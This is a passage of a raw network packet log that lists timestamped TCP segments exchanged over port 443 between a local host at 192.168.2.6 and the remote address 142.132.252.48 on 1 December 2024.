                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.002413034 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.002433062 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.002464056 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.002474070 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.002531052 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.007522106 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.007536888 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.007613897 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.007613897 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.007620096 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.008059025 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.166445971 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.166472912 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.166517973 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.166534901 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.166563988 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.166578054 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.175503969 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.175529957 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.175589085 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.175601006 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.175640106 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.181421041 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.181437969 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.181509018 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.181518078 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.181603909 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.186959028 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.186979055 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.187047958 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.187057972 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.187088966 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.192742109 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.192758083 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.192816019 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.192826033 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.192864895 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.197635889 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.197652102 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.197715044 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.197721958 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.197758913 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.203239918 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.203255892 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.203341007 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.203347921 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.203387976 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.208946943 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.208962917 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.209022999 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.209029913 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.209070921 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.286401033 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.367655039 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.367675066 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.367719889 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.367732048 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.367763996 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.376300097 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.376318932 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.376353979 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.376364946 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.376375914 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.376398087 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.382564068 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.382586956 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.382613897 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.382627010 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.382654905 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.382669926 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.388186932 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.388202906 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.388237000 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.388250113 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.388279915 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.388289928 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.394083023 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.394098043 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.394177914 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.394191980 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.394229889 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.399451971 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.399466991 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.399508953 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.399532080 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.399643898 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.404671907 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.404686928 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.404726028 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.404733896 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.404767036 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.404779911 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.410314083 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.410330057 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.410362005 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.410377026 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.410394907 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.410418987 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.569391012 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.569415092 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.569458008 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.569483042 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.569509983 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.569525003 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.577780008 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.577796936 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.577841043 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.577857018 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.577888966 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.583897114 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.583914042 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.583950043 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.583971024 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.583992004 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.584007978 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.589591026 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.589612961 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.589665890 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.589674950 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.589710951 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.595272064 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.595290899 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.595324993 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.595344067 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.595366001 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.595383883 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.600254059 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.600281954 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.600322008 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.600338936 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.600366116 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.600383043 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.605962992 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.605978012 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.606028080 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.606040955 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.606092930 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.611593008 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.611610889 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.611668110 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.631146908 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.631166935 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.631206989 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.770703077 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.770725012 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.770812988 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.770833969 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.770874977 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.778959990 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.778975964 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.779030085 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.779047966 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.779089928 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.785164118 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.785180092 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.785238981 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.785265923 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.785305023 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.790966034 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.790981054 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.791037083 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.791059971 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.791102886 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.796515942 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.796531916 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.796588898 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.796596050 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.796637058 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.801512957 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.801528931 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.801601887 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.801620960 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.801661968 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.807280064 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.807302952 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.807359934 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.807385921 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.807425976 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.812835932 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.812860966 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.812913895 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.812938929 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.812980890 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.948607922 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.953730106 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.971887112 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.971913099 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.971963882 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.971993923 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.972012997 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.972029924 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.980170012 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.980186939 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.980226994 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.980252981 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.980268002 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.980287075 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.986609936 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.986628056 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.986665964 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.986696005 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.986711979 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.986736059 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.992393970 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.992412090 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.992461920 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.992486954 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.992521048 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.997950077 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.997966051 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.998012066 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.998042107 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:49.998142004 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.003743887 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.003760099 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.003812075 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.003838062 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.003879070 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.008620977 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.008637905 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.008682013 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.008708000 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.008745909 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.014374018 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.014388084 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.014441967 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.014467955 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.014508963 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.092767954 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.172996998 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.173017979 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.173118114 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.173131943 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.173335075 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.181945086 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.181962967 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.182034016 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.182060003 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.182101011 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.188199997 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.188215971 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.188266993 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.188275099 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.188319921 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.193823099 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.193839073 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.193882942 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.193888903 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.193969965 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.199430943 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.199451923 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.199484110 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.199490070 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.199505091 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.199527979 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.204519987 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.204535961 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.204581022 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.204587936 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.204626083 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.210069895 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.210088015 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.210134983 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.210140944 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.210176945 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.215795040 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.215810061 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.215862036 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.215867996 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.215908051 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.280061007 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:50.375114918 CET44349721142.132.252.48192.168.2.6
